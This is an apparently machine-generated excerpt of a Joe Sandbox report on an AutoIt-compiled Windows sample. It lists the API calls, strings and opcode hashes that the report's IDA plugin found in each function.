                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1687751970-22481851
                                                                            • Opcode ID: 9b62aa75d0e16d20b99ed6d89c3f0b86a753bd7fcaa66db73bebb4e65b3e87d9
                                                                            • Instruction ID: 9d5862abaab62c305cafcbc2a7816bb8bb221bc1fc013f25f62c77b25eec1742
                                                                            • Opcode Fuzzy Hash: 9b62aa75d0e16d20b99ed6d89c3f0b86a753bd7fcaa66db73bebb4e65b3e87d9
                                                                            • Instruction Fuzzy Hash: C9410676C11629ABDF16EBA4DC95DEEB7B8BF04700F004569F901B71A1EB709E05CB90
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 003467FD
                                                                            • __swprintf.LIBCMT ref: 0034680A
                                                                              • Part of subcall function 0032172B: __woutput_l.LIBCMT ref: 00321784
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00346834
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00346840
                                                                            • LockResource.KERNEL32(00000000), ref: 0034684D
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0034686D
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0034687F
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0034688E
                                                                            • LockResource.KERNEL32(?), ref: 0034689A
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003468F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID: 5;
                                                                            • API String ID: 1433390588-4144742158
                                                                            • Opcode ID: 6f38d1165ec55b4936b3bf37d8daf8db416daf4566d7231f1122fa4ed5e852b2
                                                                            • Instruction ID: ecd7a9974e7b79e497de6ebfb3bed85d0d805340190ff43a66cb5eb2ce89f861
                                                                            • Opcode Fuzzy Hash: 6f38d1165ec55b4936b3bf37d8daf8db416daf4566d7231f1122fa4ed5e852b2
                                                                            • Instruction Fuzzy Hash: EA31707190021AABDB129F60ED56EBFBBECFF09340F004825F902EA151E734E911DB61
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003736F4,00000010,?,Bad directive syntax error,0039DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003425D6
                                                                            • LoadStringW.USER32(00000000,?,003736F4,00000010), ref: 003425DD
                                                                            • _wprintf.LIBCMT ref: 00342610
                                                                            • __swprintf.LIBCMT ref: 00342632
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003426A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1080873982-4153970271
                                                                            • Opcode ID: da9f720ae6d1e854f1f4af19fd3cd9f75bbabd451d8e41d4e3413efdb14ffb01
                                                                            • Instruction ID: 0278ca94ff7300b7fdb194c69c1155ebbfbd2c69707c89e905f00b5da122018f
                                                                            • Opcode Fuzzy Hash: da9f720ae6d1e854f1f4af19fd3cd9f75bbabd451d8e41d4e3413efdb14ffb01
                                                                            • Instruction Fuzzy Hash: 22212E3190022ABFCF17AB90DC5AEEE7779BF18304F444455F5056A0A2EA75AA14DF60
                                                                            APIs
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00347B42
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00347B58
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00347B69
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00347B7B
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00347B8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: SendString
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 890592661-1007645807
                                                                            • Opcode ID: 637a47069d744ae1bc459f3790d1d3b33915fd20ba230f8f1d6e1ef08160cc75
                                                                            • Instruction ID: f4e6d1c63b60f4c7856c05e418d5b906f29f2f73f95cb44c1346319ceb06b74c
                                                                            • Opcode Fuzzy Hash: 637a47069d744ae1bc459f3790d1d3b33915fd20ba230f8f1d6e1ef08160cc75
                                                                            • Instruction Fuzzy Hash: 7111C4F069126979D722B761CC5BDFFBABCEB91B14F000519B511AA0C1EE602A48CAB0
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00347794
                                                                              • Part of subcall function 0031DC38: timeGetTime.WINMM(?,76AAB400,003758AB), ref: 0031DC3C
                                                                            • Sleep.KERNEL32(0000000A), ref: 003477C0
                                                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003477E4
                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00347806
                                                                            • SetActiveWindow.USER32 ref: 00347825
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00347833
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00347852
                                                                            • Sleep.KERNEL32(000000FA), ref: 0034785D
                                                                            • IsWindow.USER32 ref: 00347869
                                                                            • EndDialog.USER32(00000000), ref: 0034787A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 855ae5d11bc5a7548af1b84ffa8e3627fcfaa2b72fe88b3c29ee2ded8f326aa5
                                                                            • Instruction ID: 6503217fb2d81fa74e3667426f8bcb6c186bd60e84b3b8543692ca115173ea9f
                                                                            • Opcode Fuzzy Hash: 855ae5d11bc5a7548af1b84ffa8e3627fcfaa2b72fe88b3c29ee2ded8f326aa5
                                                                            • Instruction Fuzzy Hash: 4F2158B4204349AFE7035B20EC8DEA63FADFB49348F418465F546CA1A2DB65BC04DB61
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CoInitialize.OLE32(00000000), ref: 0035034B
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003503DE
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 003503F2
                                                                            • CoCreateInstance.OLE32(0038DA8C,00000000,00000001,003B3CF8,?), ref: 0035043E
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003504AD
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00350505
                                                                            • _memset.LIBCMT ref: 00350542
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0035057E
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003505A1
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 003505A8
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003505DF
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 003505E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: 9b8d9dc1036c0a5673b11e8d22c1e3829f70d1d62e133962766bc7047ce33d90
                                                                            • Instruction ID: 5539460e0bc39ab5575810ff6a72c7167c45936ab039a35f22817728c092a80b
                                                                            • Opcode Fuzzy Hash: 9b8d9dc1036c0a5673b11e8d22c1e3829f70d1d62e133962766bc7047ce33d90
                                                                            • Instruction Fuzzy Hash: 8CB1F975A00208AFDB05DFA4C898DAEBBB9FF48305F1484A9E905EB261DB31ED45CF50
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00342ED6
                                                                            • SetKeyboardState.USER32(?), ref: 00342F41
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00342F61
                                                                            • GetKeyState.USER32(000000A0), ref: 00342F78
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00342FA7
                                                                            • GetKeyState.USER32(000000A1), ref: 00342FB8
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00342FE4
                                                                            • GetKeyState.USER32(00000011), ref: 00342FF2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0034301B
                                                                            • GetKeyState.USER32(00000012), ref: 00343029
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00343052
                                                                            • GetKeyState.USER32(0000005B), ref: 00343060
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: f04eac8083ad4c010402da1148325e07d07376e0a2eedd1d0093aab24315b4f9
                                                                            • Instruction ID: a6a0f7b4d83f8799cbeff60e64c8664baf9a4a2ae86b450c0c790705a8c8a87d
                                                                            • Opcode Fuzzy Hash: f04eac8083ad4c010402da1148325e07d07376e0a2eedd1d0093aab24315b4f9
                                                                            • Instruction Fuzzy Hash: FC519660A0478429FB37DBA488517EABFF49F11340F89459AE5C26F1C2DA54BB8CC762
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0033ED1E
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033ED30
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0033ED8E
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0033ED99
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033EDAB
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0033EE01
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0033EE0F
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033EE20
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0033EE63
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0033EE71
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0033EE8E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0033EE9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 903e52c4b088b01cbbf22e8de0f5e0ead37e3fb206d68bac9fe6590d97203536
                                                                            • Instruction ID: 79fa7c07ca18385a3bba0a15971df9cfef33662561380420aec4e9d86e5f4386
                                                                            • Opcode Fuzzy Hash: 903e52c4b088b01cbbf22e8de0f5e0ead37e3fb206d68bac9fe6590d97203536
                                                                            • Instruction Fuzzy Hash: 00512EB1B00309AFDF19DF69DD85AAEBBBAEB88310F558169F519D72D0E7709D008B10
                                                                            APIs
                                                                              • Part of subcall function 0031B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0031B759,?,00000000,?,?,?,?,0031B72B,00000000,?), ref: 0031BA58
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0031B72B), ref: 0031B7F6
                                                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0031B88D
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0037D8A6
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D8D7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D8EE
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D90A
                                                                            • DeleteObject.GDI32(00000000), ref: 0037D91C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: a85146e79bc64df3cc95bd3ed414b8303a19360d2bc25413990b07b0f950f24f
                                                                            • Instruction ID: d7f8e9f17d28eb5667b0be79e958c7b2d0e56d9aa5d8cd2b773fd19ca9668994
                                                                            • Opcode Fuzzy Hash: a85146e79bc64df3cc95bd3ed414b8303a19360d2bc25413990b07b0f950f24f
                                                                            • Instruction Fuzzy Hash: 80617731500701DFDB3B9F14D988BA5F7B9FF9A715F15411DE4868AAA0C774A8E0EB80
                                                                            APIs
                                                                              • Part of subcall function 0031B526: GetWindowLongW.USER32(?,000000EB), ref: 0031B537
                                                                            • GetSysColor.USER32(0000000F), ref: 0031B438
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 0eabc1a200695e46d0119c2b7a0ace90b7988f452665b63978e9b7b3d8f529d7
                                                                            • Instruction ID: f380161633bf5d15bc416476c1d986caaa584b8f5f9997e384fc0f38ad6d8e56
                                                                            • Opcode Fuzzy Hash: 0eabc1a200695e46d0119c2b7a0ace90b7988f452665b63978e9b7b3d8f529d7
                                                                            • Instruction Fuzzy Hash: 414193300001449BDF375F69D889BF9776AAF4A731F198291FD658E5E6DB308C81D721
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                            • String ID:
                                                                            • API String ID: 136442275-0
                                                                            • Opcode ID: 42d07a96302098baa001b39d94da6d55ba56ee1dce2cebebee884dcb2fb4f8fb
                                                                            • Instruction ID: cbdddcacabfabb73eed64a2a73e306b3ae91e1ee07be01a6ffb6c9ba2a68be11
                                                                            • Opcode Fuzzy Hash: 42d07a96302098baa001b39d94da6d55ba56ee1dce2cebebee884dcb2fb4f8fb
                                                                            • Instruction Fuzzy Hash: 4D4121B684512CAFCF66DB90DC46DDB73BCEB44300F0041A6F659AA051EA70A7E88F51
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(0039DC00,0039DC00,0039DC00), ref: 0034D7CE
                                                                            • GetDriveTypeW.KERNEL32(?,003B3A70,00000061), ref: 0034D898
                                                                            • _wcscpy.LIBCMT ref: 0034D8C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1000479233
                                                                            • Opcode ID: 24f5432f69e03b46ea5c04fa4582ff234aaaea19df9eebbe982f9e57a49c3211
                                                                            • Instruction ID: 6219d4a01484e62e4e52a224a00aa90d7b4876f74900b2663770578bfd726783
                                                                            • Opcode Fuzzy Hash: 24f5432f69e03b46ea5c04fa4582ff234aaaea19df9eebbe982f9e57a49c3211
                                                                            • Instruction Fuzzy Hash: 87516235104301AFC706EF14DC91AAEB7E5EF98314F20892DF99A5F2A2DB71ED45CA42
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 003093AB
                                                                            • __itow.LIBCMT ref: 003093DF
                                                                              • Part of subcall function 00321557: _xtow@16.LIBCMT ref: 00321578
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf_xtow@16
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 1502193981-2263619337
                                                                            • Opcode ID: 62b025710b14969667ee63813ff012723a6097eb75b79a3c2e24b01d6fb5d463
                                                                            • Instruction ID: 1564bd00668b0f2d80f851f33a5936c15d2cf774d61d220d4900e33f0caf59b4
                                                                            • Opcode Fuzzy Hash: 62b025710b14969667ee63813ff012723a6097eb75b79a3c2e24b01d6fb5d463
                                                                            • Instruction Fuzzy Hash: 8941E575501215AFDB2BDB78D951FAAB3E8EF48300F2084AAE149DB1D2EB35E941CB10
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0036A259
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0036A260
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0036A273
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0036A27B
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0036A286
                                                                            • DeleteDC.GDI32(00000000), ref: 0036A28F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0036A299
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0036A2AD
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0036A2B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: 6f8e947bb41eb0b81292ba93175e73ac43769d3193c9d5eeba61ec967d40eef6
                                                                            • Instruction ID: aae37fd3ae6728b4c15dea845969002121935cb7ea5c839dfabcc45e4fc705cd
                                                                            • Opcode Fuzzy Hash: 6f8e947bb41eb0b81292ba93175e73ac43769d3193c9d5eeba61ec967d40eef6
                                                                            • Instruction Fuzzy Hash: 47318B31140618ABDF239FA4DC49FEA3B6DFF0A364F114214FA19A60E0C736D811DBA4
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 2620052-3771769585
